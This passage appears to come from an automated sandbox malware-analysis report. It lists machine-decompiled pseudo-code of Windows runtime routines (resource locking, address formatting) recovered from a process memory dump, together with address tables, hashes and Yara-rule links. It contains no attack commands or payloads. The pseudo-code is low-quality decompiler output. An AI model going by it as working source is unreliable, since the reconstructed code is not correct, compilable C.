								goto L34;
							}
						}
						L8:
						if(_v8 > 7) {
							goto L41;
						}
						_t142 = _t141;
						if(E022306BA(_t123, _t141) == 0 || _t124 == 0) {
							if(E022306BA(_t124, _t142) == 0 || E02230A5B(_t125, _t142) == 0 || _v24 > 0) {
								goto L41;
							} else {
								_t128 = 1;
								_a7 = 1;
								_v28 = _t179;
								_v16 = 1;
								_v12 = 1;
								L39:
								if(_v16 == _t128) {
									goto L20;
								}
								goto L28;
							}
						} else {
							_a7 = 0;
							_v28 = _t179;
							_v16 = 1;
							_v12 = 1;
							goto L20;
						}
					}
				}
				L1:
				_t123 = _t108 == 1;
				if(_t108 == 1) {
					goto L8;
				}
				_t128 = 1;
				goto L39;
			}

























                                                0x02230b21
                                                0x02230b24
                                                0x02230b27
                                                0x02230b2a
                                                0x02230b2d
                                                0x02230b30
                                                0x02230b33
                                                0x02230b36
                                                0x02230b39
                                                0x02230b3e
                                                0x02230c65
                                                0x02230c68
                                                0x02230c6a
                                                0x02230c6f
                                                0x0225eb42
                                                0x00000000
                                                0x00000000
                                                0x0225eb48
                                                0x0225eb48
                                                0x02230c75
                                                0x02230c7a
                                                0x0225eb54
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0225eb5a
                                                0x02230c80
                                                0x02230c84
                                                0x0225eb98
                                                0x00000000
                                                0x00000000
                                                0x0225eba6
                                                0x02230cb8
                                                0x02230cba
                                                0x02230cd3
                                                0x02230cda
                                                0x02230ce4
                                                0x02230ce9
                                                0x00000000
                                                0x02230cec
                                                0x02230c8c
                                                0x0225eb63
                                                0x00000000
                                                0x00000000
                                                0x0225eb70
                                                0x0225eb75
                                                0x0225eb7d
                                                0x00000000
                                                0x00000000
                                                0x0225eb8c
                                                0x00000000
                                                0x0225eb8c
                                                0x02230c96
                                                0x00000000
                                                0x00000000
                                                0x02230ca2
                                                0x02230cac
                                                0x02230cb4
                                                0x00000000
                                                0x00000000
                                                0x02230b44
                                                0x02230b47
                                                0x02230b49
                                                0x00000000
                                                0x00000000
                                                0x02230b4f
                                                0x02230b50
                                                0x00000000
                                                0x00000000
                                                0x02230b56
                                                0x02230b62
                                                0x02230b7c
                                                0x02230bac
                                                0x02230a0f
                                                0x0225eaaa
                                                0x00000000
                                                0x0225eac4
                                                0x0225eac4
                                                0x02230bd0
                                                0x02230bd0
                                                0x02230bd4
                                                0x02230bd9
                                                0x00000000
                                                0x00000000
                                                0x02230bdb
                                                0x02230be0
                                                0x0225eb0e
                                                0x02230a1a
                                                0x00000000
                                                0x02230a1a
                                                0x0225eb1a
                                                0x0225eb1f
                                                0x0225eb27
                                                0x00000000
                                                0x00000000
                                                0x0225eb36
                                                0x00000000
                                                0x0225eb36
                                                0x02230bea
                                                0x00000000
                                                0x00000000
                                                0x02230bf6
                                                0x02230c00
                                                0x02230c03
                                                0x02230c0b
                                                0x00000000
                                                0x02230c0b
                                                0x0225eaaa
                                                0x00000000
                                                0x02230a15
                                                0x02230bb6
                                                0x00000000
                                                0x02230bc6
                                                0x02230bc6
                                                0x02230bcb
                                                0x02230c15
                                                0x00000000
                                                0x00000000
                                                0x02230c1d
                                                0x02230c20
                                                0x02230c21
                                                0x02230c24
                                                0x02230c24
                                                0x02230c26
                                                0x00000000
                                                0x02230c26
                                                0x02230bcd
                                                0x00000000
                                                0x02230bcd
                                                0x02230b89
                                                0x02230b89
                                                0x02230b90
                                                0x00000000
                                                0x00000000
                                                0x02230b96
                                                0x00000000
                                                0x02230b96
                                                0x02230a04
                                                0x02230a04
                                                0x02230b9a
                                                0x02230b9a
                                                0x02230b9b
                                                0x02230b9f
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x02230ba5
                                                0x02230ac7
                                                0x02230aca
                                                0x0225eacf
                                                0x00000000
                                                0x0225eade
                                                0x0225eade
                                                0x0225eae3
                                                0x00000000
                                                0x00000000
                                                0x0225eaf3
                                                0x0225eaf6
                                                0x0225eaf7
                                                0x0225eafe
                                                0x0225eb01
                                                0x00000000
                                                0x0225eb01
                                                0x0225eacf
                                                0x02230ad0
                                                0x02230ad4
                                                0x00000000
                                                0x00000000
                                                0x02230ada
                                                0x02230ae6
                                                0x02230c34
                                                0x00000000
                                                0x02230c47
                                                0x02230c49
                                                0x02230c4a
                                                0x02230c4e
                                                0x02230c51
                                                0x02230c54
                                                0x02230c57
                                                0x02230c5a
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x02230c60
                                                0x02230afb
                                                0x02230afe
                                                0x02230b02
                                                0x02230b05
                                                0x02230b08
                                                0x00000000
                                                0x02230b08
                                                0x02230ae6
                                                0x02230b44
                                                0x022309f8
                                                0x022309f8
                                                0x022309f9
                                                0x00000000
                                                0x00000000
                                                0x0225eaa0
                                                0x00000000

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2344563978.00000000021E0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: true
                                                • Associated: 00000009.00000002.2344559335.00000000021D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344635555.00000000022C0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344640452.00000000022D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344646208.00000000022D4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344651330.00000000022D7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344656029.00000000022E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344707073.0000000002340000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: __fassign
                                                • String ID: .$:$:
                                                • API String ID: 3965848254-2308638275
                                                • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                • Instruction ID: cf7d1ed0b661b976d3c315df47bae200dc360e3ed839d554defde9ce4a3205c4
                                                • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                • Instruction Fuzzy Hash: ABA18DB1D2031ADECF26CFE4C8446BEB7B5AF05309F24886AD842A7249D7749B45CB61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02230554, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 50%
                                                			E02230554(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int* _t49;
				signed int _t51;
				signed int _t56;
				signed int _t58;
				signed int _t61;
				signed int _t63;
				void* _t66;
				intOrPtr _t67;
				void* _t69;
				signed int _t70;
				void* _t75;
				signed int _t81;
				signed int _t84;
				void* _t86;
				signed int _t93;
				signed int _t96;
				intOrPtr _t105;
				signed int _t107;
				void* _t110;
				signed int _t115;
				signed int* _t119;
				void* _t125;
				void* _t126;
				signed int _t128;
				signed int _t130;
				signed int _t138;
				signed int _t144;
				void* _t158;
				void* _t159;
				void* _t160;

				_t96 = _a4;
				_t115 =  *(_t96 + 0x28);
				_push(_t138);
				if(_t115 < 0) {
					_t105 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
						goto L6;
					} else {
						__eflags = _t115 | 0xffffffff;
						asm("lock xadd [eax], edx");
						return 1;
					}
				} else {
					L6:
					_push(_t128);
					while(1) {
						L7:
						__eflags = _t115;
						if(_t115 >= 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
							_t49 = _t96 + 0x1c;
							_t106 = 1;
							asm("lock xadd [edx], ecx");
							_t115 =  *(_t96 + 0x28);
							__eflags = _t115;
							if(_t115 < 0) {
								L23:
								_t130 = 0;
								__eflags = 0;
								while(1) {
									_t118 =  *(_t96 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x022d01c0;
									_push(_t144);
									_push(0);
									_t51 = E021EF8CC( *((intOrPtr*)(_t96 + 0x18)));
									__eflags = _t51 - 0x102;
									if(_t51 != 0x102) {
										break;
									}
									_t106 =  *(_t144 + 4);
									_t126 =  *_t144;
									_t86 = E02234FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
									_push(_t126);
									_push(_t86);
									E02243F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
									E02243F92(0x65, 0, "RTL: Resource at %p\n", _t96);
									_t130 = _t130 + 1;
									_t160 = _t158 + 0x28;
									__eflags = _t130 - 2;
									if(__eflags > 0) {
										E0227217A(_t106, __eflags, _t96);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E02243F92();
									_t158 = _t160 + 0xc;
								}
								__eflags = _t51;
								if(__eflags < 0) {
									_push(_t51);
									E02233915(_t96, _t106, _t118, _t130, _t144, __eflags);
									asm("int3");
									while(1) {
										L32:
										__eflags = _a8;
										if(_a8 == 0) {
											break;
										}
										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
										_t119 = _t96 + 0x24;
										_t107 = 1;
										asm("lock xadd [eax], ecx");
										_t56 =  *(_t96 + 0x28);
										_a4 = _t56;
										__eflags = _t56;
										if(_t56 != 0) {
											L40:
											_t128 = 0;
											__eflags = 0;
											while(1) {
												_t121 =  *(_t96 + 0x30) & 0x00000001;
												asm("sbb esi, esi");
												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x022d01c0;
												_push(_t138);
												_push(0);
												_t58 = E021EF8CC( *((intOrPtr*)(_t96 + 0x20)));
												__eflags = _t58 - 0x102;
												if(_t58 != 0x102) {
													break;
												}
												_t107 =  *(_t138 + 4);
												_t125 =  *_t138;
												_t75 = E02234FC0(_t125, _t107, 0xff676980, 0xffffffff);
												_push(_t125);
												_push(_t75);
												E02243F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
												E02243F92(0x65, 0, "RTL: Resource at %p\n", _t96);
												_t128 = _t128 + 1;
												_t159 = _t158 + 0x28;
												__eflags = _t128 - 2;
												if(__eflags > 0) {
													E0227217A(_t107, __eflags, _t96);
												}
												_push("RTL: Re-Waiting\n");
												_push(0);
												_push(0x65);
												E02243F92();
												_t158 = _t159 + 0xc;
											}
											__eflags = _t58;
											if(__eflags < 0) {
												_push(_t58);
												E02233915(_t96, _t107, _t121, _t128, _t138, __eflags);
												asm("int3");
												_t61 =  *_t107;
												 *_t107 = 0;
												__eflags = _t61;
												if(_t61 == 0) {
													L1:
													_t63 = E02215384(_t138 + 0x24);
													if(_t63 != 0) {
														goto L52;
													} else {
														goto L2;
													}
												} else {
													_t123 =  *((intOrPtr*)(_t138 + 0x18));
													_push( &_a4);
													_push(_t61);
													_t70 = E021EF970( *((intOrPtr*)(_t138 + 0x18)));
													__eflags = _t70;
													if(__eflags >= 0) {
														goto L1;
													} else {
														_push(_t70);
														E02233915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
														L52:
														_t122 =  *((intOrPtr*)(_t138 + 0x20));
														_push( &_a4);
														_push(1);
														_t63 = E021EF970( *((intOrPtr*)(_t138 + 0x20)));
														__eflags = _t63;
														if(__eflags >= 0) {
															L2:
															return _t63;
														} else {
															_push(_t63);
															E02233915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
															_t109 =  *((intOrPtr*)(_t138 + 0x20));
															_push( &_a4);
															_push(1);
															_t63 = E021EF970( *((intOrPtr*)(_t138 + 0x20)));
															__eflags = _t63;
															if(__eflags >= 0) {
																goto L2;
															} else {
																_push(_t63);
																_t66 = E02233915(_t96, _t109, _t122, _t128, _t138, __eflags);
																asm("int3");
																while(1) {
																	_t110 = _t66;
																	__eflags = _t66 - 1;
																	if(_t66 != 1) {
																		break;
																	}
																	_t128 = _t128 | 0xffffffff;
																	_t66 = _t110;
																	asm("lock cmpxchg [ebx], edi");
																	__eflags = _t66 - _t110;
																	if(_t66 != _t110) {
																		continue;
																	} else {
																		_t67 =  *[fs:0x18];
																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
																		return _t67;
																	}
																	goto L59;
																}
																E02215329(_t110, _t138);
																_t69 = E022153A5(_t138, 1);
																return _t69;
															}
														}
													}
												}
											} else {
												_t56 =  *(_t96 + 0x28);
												goto L3;
											}
										} else {
											_t107 =  *_t119;
											__eflags = _t107;
											if(__eflags > 0) {
												while(1) {
													_t81 = _t107;
													asm("lock cmpxchg [edi], esi");
													__eflags = _t81 - _t107;
													if(_t81 == _t107) {
														break;
													}
													_t107 = _t81;
													__eflags = _t81;
													if(_t81 > 0) {
														continue;
													}
													break;
												}
												_t56 = _a4;
												__eflags = _t107;
											}
											if(__eflags != 0) {
												while(1) {
													L3:
													__eflags = _t56;
													if(_t56 != 0) {
														goto L32;
													}
													_t107 = _t107 | 0xffffffff;
													_t56 = 0;
													asm("lock cmpxchg [edx], ecx");
													__eflags = 0;
													if(0 != 0) {
														continue;
													} else {
														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
														return 1;
													}
													goto L59;
												}
												continue;
											} else {
												goto L40;
											}
										}
										goto L59;
									}
									__eflags = 0;
									return 0;
								} else {
									_t115 =  *(_t96 + 0x28);
									continue;
								}
							} else {
								_t106 =  *_t49;
								__eflags = _t106;
								if(__eflags > 0) {
									while(1) {
										_t93 = _t106;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t93 - _t106;
										if(_t93 == _t106) {
											break;
										}
										_t106 = _t93;
										__eflags = _t93;
										if(_t93 > 0) {
											continue;
										}
										break;
									}
									__eflags = _t106;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L23;
								}
							}
						}
						goto L59;
					}
					_t84 = _t115;
					asm("lock cmpxchg [esi], ecx");
					__eflags = _t84 - _t115;
					if(_t84 != _t115) {
						_t115 = _t84;
						goto L7;
					} else {
						return 1;
					}
				}
				L59:
			}




































                                                0x0223055a
                                                0x0223055d
                                                0x02230563
                                                0x02230566
                                                0x022305d8
                                                0x022305e2
                                                0x022305e5
                                                0x00000000
                                                0x022305e7
                                                0x022305e7
                                                0x022305ea
                                                0x022305f3
                                                0x022305f3
                                                0x02230568
                                                0x02230568
                                                0x02230568
                                                0x02230569
                                                0x02230569
                                                0x02230569
                                                0x0223056b
                                                0x00000000
                                                0x00000000
                                                0x0225217f
                                                0x02252183
                                                0x0225225b
                                                0x0225225f
                                                0x02252189
                                                0x0225218c
                                                0x0225218f
                                                0x02252194
                                                0x02252199
                                                0x0225219d
                                                0x022521a0
                                                0x022521a2
                                                0x022521ce
                                                0x022521ce
                                                0x022521ce
                                                0x022521d0
                                                0x022521d6
                                                0x022521de
                                                0x022521e2
                                                0x022521e8
                                                0x022521e9
                                                0x022521ec
                                                0x022521f1
                                                0x022521f6
                                                0x00000000
                                                0x00000000
                                                0x022521f8
                                                0x022521fb
                                                0x02252206
                                                0x0225220b
                                                0x0225220c
                                                0x02252217
                                                0x02252226
                                                0x0225222b
                                                0x0225222c
                                                0x0225222f
                                                0x02252232
                                                0x02252235
                                                0x02252235
                                                0x0225223a
                                                0x0225223f
                                                0x02252241
                                                0x02252243
                                                0x02252248
                                                0x02252248
                                                0x0225224d
                                                0x0225224f
                                                0x02252262
                                                0x02252263
                                                0x02252268
                                                0x02252269
                                                0x02252269
                                                0x02252269
                                                0x0225226d
                                                0x00000000
                                                0x00000000
                                                0x02252276
                                                0x02252279
                                                0x0225227e
                                                0x02252283
                                                0x02252287
                                                0x0225228a
                                                0x0225228d
                                                0x0225228f
                                                0x022522bc
                                                0x022522bc
                                                0x022522bc
                                                0x022522be
                                                0x022522c4
                                                0x022522cc
                                                0x022522d0
                                                0x022522d6
                                                0x022522d7
                                                0x022522da
                                                0x022522df
                                                0x022522e4
                                                0x00000000
                                                0x00000000
                                                0x022522e6
                                                0x022522e9
                                                0x022522f4
                                                0x022522f9
                                                0x022522fa
                                                0x02252305
                                                0x02252314
                                                0x02252319
                                                0x0225231a
                                                0x0225231d
                                                0x02252320
                                                0x02252323
                                                0x02252323
                                                0x02252328
                                                0x0225232d
                                                0x0225232f
                                                0x02252331
                                                0x02252336
                                                0x02252336
                                                0x0225233b
                                                0x0225233d
                                                0x02252350
                                                0x02252351
                                                0x02252356
                                                0x02252359
                                                0x02252359
                                                0x0225235b
                                                0x0225235d
                                                0x02215367
                                                0x0221536b
                                                0x02215372
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x02252363
                                                0x02252363
                                                0x02252369
                                                0x0225236a
                                                0x0225236c
                                                0x02252371
                                                0x02252373
                                                0x00000000
                                                0x02252379
                                                0x02252379
                                                0x0225237a
                                                0x0225237f
                                                0x0225237f
                                                0x02252385
                                                0x02252386
                                                0x02252389
                                                0x0225238e
                                                0x02252390
                                                0x02215378
                                                0x0221537c
                                                0x02252396
                                                0x02252396
                                                0x02252397
                                                0x0225239c
                                                0x022523a2
                                                0x022523a3
                                                0x022523a6
                                                0x022523ab
                                                0x022523ad
                                                0x00000000
                                                0x022523b3
                                                0x022523b3
                                                0x022523b4
                                                0x022523b9
                                                0x022523ba
                                                0x022523ba
                                                0x022523bc
                                                0x022523bf
                                                0x00000000
                                                0x00000000
                                                0x02249153
                                                0x02249158
                                                0x0224915a
                                                0x0224915e
                                                0x02249160
                                                0x00000000
                                                0x02249166
                                                0x02249166
                                                0x02249171
                                                0x02249176
                                                0x02249176
                                                0x00000000
                                                0x02249160
                                                0x022523c6
                                                0x022523ce
                                                0x022523d7
                                                0x022523d7
                                                0x022523ad
                                                0x02252390
                                                0x02252373
                                                0x0225233f
                                                0x0225233f
                                                0x00000000
                                                0x0225233f
                                                0x02252291
                                                0x02252291
                                                0x02252293
                                                0x02252295
                                                0x0225229a
                                                0x022522a1
                                                0x022522a3
                                                0x022522a7
                                                0x022522a9
                                                0x00000000
                                                0x00000000
                                                0x022522ab
                                                0x022522ad
                                                0x022522af
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x022522af
                                                0x022522b1
                                                0x022522b4
                                                0x022522b4
                                                0x022522b6
                                                0x022153be
                                                0x022153be
                                                0x022153be
                                                0x022153c0
                                                0x00000000
                                                0x00000000
                                                0x022153cb
                                                0x022153ce
                                                0x022153d0
                                                0x022153d4
                                                0x022153d6
                                                0x00000000
                                                0x022153d8
                                                0x022153e3
                                                0x022153ea
                                                0x022153ea
                                                0x00000000
                                                0x022153d6
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x022522b6
                                                0x00000000
                                                0x0225228f
                                                0x02252349
                                                0x0225234d
                                                0x02252251
                                                0x02252251
                                                0x00000000
                                                0x02252251
                                                0x022521a4
                                                0x022521a4
                                                0x022521a6
                                                0x022521a8
                                                0x022521ac
                                                0x022521b6
                                                0x022521b8
                                                0x022521bc
                                                0x022521be
                                                0x00000000
                                                0x00000000
                                                0x022521c0
                                                0x022521c2
                                                0x022521c4
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x022521c4
                                                0x022521c6
                                                0x022521c6
                                                0x022521c8
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x022521c8
                                                0x022521a2
                                                0x00000000
                                                0x02252183
                                                0x0223057b
                                                0x0223057d
                                                0x02230581
                                                0x02230583
                                                0x02252178
                                                0x00000000
                                                0x02230589
                                                0x0223058f
                                                0x0223058f
                                                0x02230583
                                                0x00000000

                                                APIs
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02252206
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2344563978.00000000021E0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: true
                                                • Associated: 00000009.00000002.2344559335.00000000021D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344635555.00000000022C0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344640452.00000000022D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344646208.00000000022D4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344651330.00000000022D7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344656029.00000000022E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344707073.0000000002340000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                • API String ID: 885266447-4236105082
                                                • Opcode ID: a4b8055a5f49a83a834f02612671c20d558ec42956e42e97470b5599df696350
                                                • Instruction ID: 684ca74920d6636729b2998c22bf27831e94f6fefeb0cb76a6931d68f4fdc06a
                                                • Opcode Fuzzy Hash: a4b8055a5f49a83a834f02612671c20d558ec42956e42e97470b5599df696350
                                                • Instruction Fuzzy Hash: E4514875720312ABEB15CE98CC80F6673AAAF84710F21C359ED15DB2C9DB71EC418BA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 022314C0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 64%
                                                			E022314C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				char _v10;
				char _v140;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t24;
				void* _t26;
				signed int _t29;
				signed int _t34;
				signed int _t40;
				intOrPtr _t45;
				void* _t51;
				intOrPtr* _t52;
				void* _t54;
				signed int _t57;
				void* _t58;

				_t51 = __edx;
				_t24 =  *0x22d2088; // 0x774c099c
				_v8 = _t24 ^ _t57;
				_t45 = _a16;
				_t53 = _a4;
				_t52 = _a20;
				if(_a4 == 0 || _t52 == 0) {
					L10:
					_t26 = 0xc000000d;
				} else {
					if(_t45 == 0) {
						if( *_t52 == _t45) {
							goto L3;
						} else {
							goto L10;
						}
					} else {
						L3:
						_t28 =  &_v140;
						if(_a12 != 0) {
							_push("[");
							_push(0x41);
							_push( &_v140);
							_t29 = E02227707();
							_t58 = _t58 + 0xc;
							_t28 = _t57 + _t29 * 2 - 0x88;
						}
						_t54 = E022313CB(_t53, _t28);
						if(_a8 != 0) {
							_t34 = E02227707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t34 * 2;
						}
						if(_a12 != 0) {
							_t40 = E02227707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t40 * 2;
						}
						_t53 = (_t54 -  &_v140 >> 1) + 1;
						 *_t52 = _t53;
						if( *_t52 < _t53) {
							goto L10;
						} else {
							E021F2340(_t45,  &_v140, _t53 + _t53);
							_t26 = 0;
						}
					}
				}
				return E021FE1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
			}




















                                                0x022314c0
                                                0x022314cb
                                                0x022314d2
                                                0x022314d6
                                                0x022314da
                                                0x022314de
                                                0x022314e3
                                                0x0223157a
                                                0x0223157a
                                                0x022314f1
                                                0x022314f3
                                                0x0225ea0f
                                                0x00000000
                                                0x0225ea15
                                                0x00000000
                                                0x0225ea15
                                                0x022314f9
                                                0x022314f9
                                                0x022314fe
                                                0x02231504
                                                0x0225ea1a
                                                0x0225ea1f
                                                0x0225ea21
                                                0x0225ea22
                                                0x0225ea27
                                                0x0225ea2a
                                                0x0225ea2a
                                                0x02231515
                                                0x02231517
                                                0x0223156d
                                                0x02231572
                                                0x02231575
                                                0x02231575
                                                0x0223151e
                                                0x0225ea50
                                                0x0225ea55
                                                0x0225ea58
                                                0x0225ea58
                                                0x0223152e
                                                0x02231531
                                                0x02231533
                                                0x00000000
                                                0x02231535
                                                0x02231541
                                                0x02231549
                                                0x02231549
                                                0x02231533
                                                0x022314f3
                                                0x02231559

                                                APIs
                                                • ___swprintf_l.LIBCMT ref: 0225EA22
                                                  • Part of subcall function 022313CB: ___swprintf_l.LIBCMT ref: 0223146B
                                                  • Part of subcall function 022313CB: ___swprintf_l.LIBCMT ref: 02231490
                                                • ___swprintf_l.LIBCMT ref: 0223156D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2344563978.00000000021E0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: true
                                                • Associated: 00000009.00000002.2344559335.00000000021D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344635555.00000000022C0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344640452.00000000022D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344646208.00000000022D4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344651330.00000000022D7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344656029.00000000022E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344707073.0000000002340000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: %%%u$]:%u
                                                • API String ID: 48624451-3050659472
                                                • Opcode ID: b105134119850998a97d2d5627a923ff8ed8dd989bd9491bc04216e1ae915fa6
                                                • Instruction ID: c6f414cabe058c392ed69d4e1360cb0a53587c5975f7ac05511178049f988fa2
                                                • Opcode Fuzzy Hash: b105134119850998a97d2d5627a923ff8ed8dd989bd9491bc04216e1ae915fa6
                                                • Instruction Fuzzy Hash: C721C5B392022AABDB21DFA4CC40AEE73ACAF54704F444111ED4AD3148DB71AA688BD1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 022153A5, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 45%
                                                			E022153A5(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t32;
				signed int _t37;
				signed int _t40;
				signed int _t42;
				void* _t45;
				intOrPtr _t46;
				void* _t48;
				signed int _t49;
				void* _t51;
				signed int _t57;
				signed int _t64;
				signed int _t71;
				void* _t74;
				intOrPtr _t78;
				signed int* _t79;
				void* _t85;
				signed int _t86;
				signed int _t92;
				void* _t104;
				void* _t105;

				_t64 = _a4;
				_t32 =  *(_t64 + 0x28);
				_t71 = _t64 + 0x28;
				_push(_t92);
				if(_t32 < 0) {
					_t78 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
						goto L3;
					} else {
						__eflags = _t32 | 0xffffffff;
						asm("lock xadd [ecx], eax");
						return 1;
					}
				} else {
					L3:
					_push(_t86);
					while(1) {
						L4:
						__eflags = _t32;
						if(_t32 == 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
							_t79 = _t64 + 0x24;
							_t71 = 1;
							asm("lock xadd [eax], ecx");
							_t32 =  *(_t64 + 0x28);
							_a4 = _t32;
							__eflags = _t32;
							if(_t32 != 0) {
								L19:
								_t86 = 0;
								__eflags = 0;
								while(1) {
									_t81 =  *(_t64 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x022d01c0;
									_push(_t92);
									_push(0);
									_t37 = E021EF8CC( *((intOrPtr*)(_t64 + 0x20)));
									__eflags = _t37 - 0x102;
									if(_t37 != 0x102) {
										break;
									}
									_t71 =  *(_t92 + 4);
									_t85 =  *_t92;
									_t51 = E02234FC0(_t85, _t71, 0xff676980, 0xffffffff);
									_push(_t85);
									_push(_t51);
									E02243F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
									E02243F92(0x65, 0, "RTL: Resource at %p\n", _t64);
									_t86 = _t86 + 1;
									_t105 = _t104 + 0x28;
									__eflags = _t86 - 2;
									if(__eflags > 0) {
										E0227217A(_t71, __eflags, _t64);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E02243F92();
									_t104 = _t105 + 0xc;
								}
								__eflags = _t37;
								if(__eflags < 0) {
									_push(_t37);
									E02233915(_t64, _t71, _t81, _t86, _t92, __eflags);
									asm("int3");
									_t40 =  *_t71;
									 *_t71 = 0;
									__eflags = _t40;
									if(_t40 == 0) {
										L1:
										_t42 = E02215384(_t92 + 0x24);
										if(_t42 != 0) {
											goto L31;
										} else {
											goto L2;
										}
									} else {
										_t83 =  *((intOrPtr*)(_t92 + 0x18));
										_push( &_a4);
										_push(_t40);
										_t49 = E021EF970( *((intOrPtr*)(_t92 + 0x18)));
										__eflags = _t49;
										if(__eflags >= 0) {
											goto L1;
										} else {
											_push(_t49);
											E02233915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
											L31:
											_t82 =  *((intOrPtr*)(_t92 + 0x20));
